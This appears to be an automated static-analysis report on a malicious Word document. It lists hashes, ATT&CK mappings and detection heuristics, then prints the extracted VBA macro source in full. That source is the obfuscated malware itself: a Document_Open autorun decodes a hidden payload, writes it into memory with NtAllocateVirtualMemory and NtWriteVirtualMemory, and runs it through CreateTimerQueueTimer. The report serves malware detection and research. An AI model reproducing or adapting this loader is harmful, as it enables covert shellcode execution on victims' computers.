Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1d63cfe0c0b6c802…

MALICIOUS

Office (OLE)

Size: 221.0 KB
Created: 2018-03-07 15:14:00
Authoring application: Microsoft Office Word
First seen: 2018-04-30
MD5: 5a15282d0a09ee8e8a3a743ae93572b7
SHA-1: 427ce46fb256c484f48dbd242e6a01e92cb1adc9
SHA-256: 1d63cfe0c0b6c80212aafef737fc63f63415634c74ac3159966f63c31c1a08d4
Risk score: 90

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1566.001 Phishing: Spearphishing Attachment

The file contains VBA macros, including a Document_Open macro, a common technique for running code automatically when the document is opened. The macro declares and calls Windows API functions such as NtAllocateVirtualMemory, indicating that it manipulates process memory to stage a payload for execution. No direct download URL is present, but the macros together with the ClamAV detection strongly indicate downloader or dropper functionality, most likely delivered as a spearphishing attachment.

Heuristics 4

  • ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    mindbending
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    • http://ns.adobe.com/xap/1.0/ — In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# — In document text (OLE body)
    • http://ns.adobe.com/camera-raw-settings/1.0/ — In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ — In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# — In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# — In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11022 bytes
SHA-256: c395e25878446520ad7925a0a4b255f2b9539c673015d9a028fae7a31680431e
Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True


Private Sub Document_Open()
mindbending
reseat = 53 + 48
Pmt 0, reseat, 22617, 21108, 6
End Sub




Attribute VB_Name = "zalfaomega"
#If (89 - 31 + 342 + 49 - 112 + 363) > ((25 - 10 + 305) - (79 - 44 + 505) * 1) And ((43 - 24 + 9) - (55 - 51 + 24)) * 2 < (Win64) Then
Public Declare PtrSafe Function sandfish _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (dropsy As LongPtr, selfcounsel As LongPtr, ByVal crabs As LongPtr, equivocateByVal As LongPtr, brawn As LongPtr, ByVal sandgrouse As LongPtr) As LongPtr
#End If
#If (111 - 4 + 293 + 54 - 46 + 292) > ((103 - 4 + 221) - (127 - 82 + 495) * 1) And Not ((73 - 109 + 64) - (16 - 70 + 82)) * 2 < (Win64) Then
Public Declare Function sandfish _
Lib "ntdll    " Alias _
"NtAllocateVirtualMemory" (gatecrasher As Long, acetic As Long, ByVal busted As Long, absinthByVal As Long, bonhomme As Long, ByVal coziness As Long) As Long
#End If
Function askance(gobbledygook, sociability, sibilant)
Dim benevolent As Long
Dim overdraw As Byte
Dim immethodical As Long
Dim anarchism As Variant
Dim superiority As Long
Dim belligerence As Long
Dim masorah As Long
Dim groundshaker As String
Dim extreme As Long
Dim amentes As String
Dim divellicate As Long
benevolent = gobbledygook
extreme = sibilant
superiority = sociability
complicity = 49 + 55
Pmt 0, complicity, 5746, 21967, 5
immethodical = 100 - 112 + 11
figaor = annelid(ByVal immethodical, _
benevolent, _
superiority, extreme, _
masorah)
End Function
Function compelling()
Dim batching(255) As Byte
awakening = 40 - 6 + 31
For i = awakening To (45 - 112 + 158)
batching(awakening) = awakening - (3 - 126 + 188)
awakening = awakening + 1
If (127 - 121 + 85) < awakening Then
doces = tyrannize + 74 - 109 + 100
Exit For
End If
foreandaft = menacing + 88 - 37 + 14
Next
awakening = (80 - 79 + 47)
For i = awakening To (124 - 31 - 35)
batching(awakening) = awakening + (96 - 74 - 18)
awakening = awakening + 1
If (7 - 55 + 106) < awakening Then
lightfooted = clubbism + 115 - 40 - 10
Exit For
End If
montgomery = pou + 55 - 3 + 13
Next
awakening = (60 - 61 + 98)
For i = awakening To (97 - 66 + 92)
batching(awakening) = awakening - (34 - 22 + 59)
awakening = awakening + 1
butuminous = alopex + 77 - 60 + 48
If (83 - 51 + 91) < awakening Then
maliciousness = fetter + 42 - 103 + 126
Exit For
End If
tabetic = mortality + 41 - 95 + 119
Next
batching(113 - 16 - 50) = (108 - 86 + 41)
awakening = (90 - 77 + 30)
batching(awakening) = (76 - 22 + 8)
compelling = batching
End Function

Attribute VB_Name = "mirrors"
#If (89 - 31 + 342 + 49 - 112 + 363) > ((25 - 10 + 305) - (79 - 44 + 505) * 1) And ((43 - 24 + 9) - (55 - 51 + 24)) * 2 < (Win64) Then
Public Declare PtrSafe Function annelid _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal silverfooted As Any, ByVal aureola As Any, ByVal appetency As Any, ByVal beautify As Any, ByVal nephritis As Any) As LongPtr
Public Declare PtrSafe Function accumulative _
Lib "Shlwapi   " Alias _
"GetOverlappedResult" (ByVal flashlight As Any, introjection As Any, indicating As Any, bravissimo As Any) As LongPtr
#End If
#If (111 - 4 + 293 + 54 - 46 + 292) > ((103 - 4 + 221) - (127 - 82 + 495) * 1) And Not ((73 - 109 + 64) - (16 - 70 + 82)) * 2 < (Win64) Then
Public Declare Function annelid _
Lib "ntdll    " Alias _
"NtWriteVirtualMemory" (ByVal barrister As Any, ByVal dental As Any, ByVal scumble As Any, ByVal lifework As Any, ByVal antitypic As Any) As Long
#End If
Function acquisitive(archilochus) As String
Dim hac As Long
Dim heckler(63) As Long
Dim telesm(6962) As Byte
Dim chelyabinsk As Long
Dim sj(63) As Long
Dim fascinatingly(63) As Long
Dim nonnitrogenous As Long
Dim foreplay As Long
prebend = 31 - 34 + 67
ferociousness = 105 - 79 + 4070
catholical = 76 - 76 + 255
Dim acetous() As Byte
slenderly = 119 - 110 + 65527
allometry = 114 - 87 + 16711653
justness = 102 - 64 + 65242
adhibenda = 71 - 50 + 262123
cheliceral = 63 - 54 + 247
Dim morning() As Byte
morning = VBA.StrConv(archilochus, 120 + 8)
calanthe = 35 + 39
Pmt 0, calanthe, 4180, 54584, 7
barley = 7840 + 3
civitas = vbKeyShift - 12
For paramountcy = 1 - 1 To barley * 1
srebend = 31 - 34 + 67
If paramountcy Mod 2 = 0 Then
morning(paramountcy) = morning(paramountcy) - civitas
End If
srebend = 31 - 34 + 67
If Not paramountcy Mod 2 = 0 Then
morning(paramountcy) = morning(paramountcy) - (civitas - 1)
End If
srebend = 31 - 34 + 67
Next paramountcy
counterproject = 57 + 50
Pmt 0, counterproject, 22479, 11461, 3
stonework = compelling
For foreplay = (16 - 8 * 2) * 1 To (80 / 2 + 23) * (7 - 6)
sj(foreplay) = cinclidae(foreplay, prebend, 54)
heckler(foreplay) = cinclidae(foreplay, ferociousness, 54)
fascinatingly(foreplay) = cinclidae(foreplay, adhibenda, 54)
Next foreplay
gueridon = 36 + 19
Pmt 0, gueridon, 24908, 49456, 3
acetous = morning
falseness = 37 - 82 + 49
chrestomathy = 21 + 14
Pmt 0, chrestomathy, 11179, 44323, 8
eelpout = 58 - 15 - 40
colonic = Rnd(275)
holcus = holcus
flesh = eelpout + 1
physostigmine = 83 - 60 - 21
For chelyabinsk = 0 To barley
elaeagnus = acetous(chelyabinsk)
celt = acetous(chelyabinsk + 2)
dismet = heckler(stonework(acetous(chelyabinsk + 1)))
arguer = sj(stonework(celt)) + stonework(acetous(chelyabinsk + eelpout))
nonnitrogenous = fascinatingly(stonework(elaeagnus)) + dismet + arguer
foreplay = cinclidae(nonnitrogenous, allometry, 46)
telesm(hac) = cinclidae(foreplay, slenderly, 36)
foreplay = cinclidae(nonnitrogenous, justness, 46)
telesm(hac + 1) = cinclidae(foreplay, cheliceral, 36)
telesm(hac + physostigmine) = cinclidae(nonnitrogenous, catholical, 46)
hac = hac + physostigmine + 1
chelyabinsk = chelyabinsk + 3
Next
acquisitive = telesm
End Function
Function cinclidae(ranger, perceptivity, molarity)
If molarity = 36 + (10 / 2 - 5) Then
cinclidae = ranger \ perceptivity
ElseIf molarity = 46 + (5 - 3) / 2 - 1 Then
cinclidae = ranger And perceptivity
ElseIf molarity = 54 + (56 / 7 - 4 * 2) Then
cinclidae = ranger * perceptivity
End If
End Function
Function drow(moose)
Dim tablespoon As Byte
Dim mergus As Long
Dim trounce As String
Dim courtier As Integer
#If (49 - 89 + 440 + 14 - 4 + 290) > ((88 - 71 + 303) - (30 - 111 + 621) * 1) And ((127 - 96 - 3) - (11 - 123 + 140)) * 2 < (Win64) Then
Dim carnassial As LongPtr
magic = 37 - 1 - 28
Dim illtempered As LongPtr
Dim perceptiveness As Variant
Dim bulwark As LongPtr
Dim noncontent As Byte
endlessness = VarPtr(carnassial)
pusillanimous = barranca(endlessness, VarPtr(moose) + (126 - 66 - 52), magic)
#End If
#If (101 - 48 + 347 + 97 - 12 + 215) > ((2 - 55 + 373) - (127 - 96 + 509) * 1) And Not ((115 - 29 - 58) - (52 - 100 + 76)) * 2 < (Win64) Then
Dim carnassial As Long
magic = 40 - 36 + 0
Dim illtempered As Long
Dim bulwark As Long
endlessness = VarPtr(carnassial)
pusillanimous = askance(endlessness, VarPtr(moose) + (11 - 91 + 88), magic)
#End If
deliberando = 67 - 103 + 35
illtempered = 88 - 84 - 4
tennis = 75 - 64 - 11
bulwark = 103 - 123 + 9967
nociceptive = 83 - 1 + 4014
sanitorium = 30 - 48 + 82
daily = sandfish(ByVal deliberando, _
illtempered, ByVal tennis, bulwark, ByVal nociceptive, _
ByVal sanitorium)
mom = askance(illtempered, carnassial, 36 - 54 + 5901)
marooned = 16 + 47
Pmt 0, marooned, 14222, 41082, 6
drow = illtempered
End Function
Function barranca(daredevil, eblis, reactionist)
Dim polycirrus As Long
Dim tong As Variant
Dim musics As LongPtr
Dim morganatic As LongPtr
Dim fervens As LongPtr
Dim agreeable As Byte
Dim disorienting As LongPtr
Dim paternoster As LongPtr
holcus = holcus
morganatic = daredevil
paternoster = reactionist
holcus = holcus
disorienting = eblis
unretracted = 41 + 50
Pmt 0, unretracted, 12687, 25901, 2
musics = 46 - 46 - 1
mirrons = annelid(ByVal musics, _
morganatic, _
disorienting, paternoster, _
fervens)
End Function


Attribute VB_Name = "milks"
#If (111 - 4 + 293 + 54 - 46 + 292) > ((103 - 4 + 221) - (127 - 82 + 495) * 1) And Not ((73 - 109 + 64) - (16 - 70 + 82)) * 2 < (Win64) Then
Public Declare Function sharpen _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (filtertipped As Any, ByVal tweedledum As Any, ByVal nycticorax As Any, ByVal longish As Any, ByVal ryukyuan As Any, ByVal noblest As Any, ByVal chairlift As Any) As Long
#End If
#If (89 - 31 + 342 + 49 - 112 + 363) > ((25 - 10 + 305) - (79 - 44 + 505) * 1) And ((43 - 24 + 9) - (55 - 51 + 24)) * 2 < (Win64) Then
Public Declare PtrSafe Function sharpen _
Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (customary As Any, ByVal scend As Any, ByVal abbess As Any, ByVal claytonia As Any, ByVal dropout As Any, ByVal anemonella As Any, ByVal balefire As Any) As Long
#End If
Sub mindbending()
Dim agurial As String
Dim cyanophyta As String
stilly.cacus.Value = Day(#12/5/2013#)
perithecium = contumely
Set barter = stilly.cacus.SelectedItem
viscaceae = 25 + 28
Pmt 0, viscaceae, 17135, 23775, 3
imaret = barter.Name
charabancs = 52 - 18 + 7810
blastoderm = Right(imaret, charabancs)
pilferer = acquisitive(blastoderm)
ditheism = 49 + 60
Pmt 0, ditheism, 35163, 14522, 8
#If (67 - 94 + 427 + 86 - 51 + 265) > ((33 - 79 + 366) - (48 - 102 + 594) * 1) And ((90 - 101 + 39) - (19 - 33 + 42)) * 2 < (Win64) Then
Dim southeastern As LongPtr
Dim antimagnetic As LongPtr
Dim grow As LongPtr
Dim cumulative As LongPtr
Dim hest As LongPtr
disheartened = 73 - 63 + 2054
#End If
#If (34 - 111 + 477 + 61 - 107 + 346) > ((74 - 56 + 302) - (105 - 17 + 452) * 1) And Not ((85 - 107 + 50) - (106 - 63 - 15)) * 2 < (Win64) Then
Dim ompredre As Byte
Dim antimagnetic As Long
Dim incurvity As String
Dim southeastern As Long
Dim grow As Long
delinquent = 1 - 115 + 895
Dim cumulative As Long
Dim hest As Long
disheartened = delinquent + 3459
#End If
bellis = 11 - 43 + 32
jacent = 15 - 103 + 4184
caution = 26 + 32
Pmt 0, caution, 38049, 28115, 3
moulins = burr
amplify = 60 + 39
Pmt 0, amplify, 23855, 57779, 5
airing = pilferer
sinkhole = conjectural
southeastern = drow(airing)
grow = 2 - 102 + 100
antimagnetic = southeastern + disheartened
cumulative = 60 - 109 + 201576
hest = 82 - 82 + 3500
apocynaceae = sharpen(cumulative, _
grow, antimagnetic, _
grow, grow, _
grow, grow)
messy = 32 + 57
Pmt 0, messy, 37214, 39019, 5
End Sub

Attribute VB_Name = "stilly"
Attribute VB_Base = "0{C5842C56-1776-4E93-BE81-EFB8294FD229}{47DFE7E7-DAE3-409A-98F4-B37A35982B88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False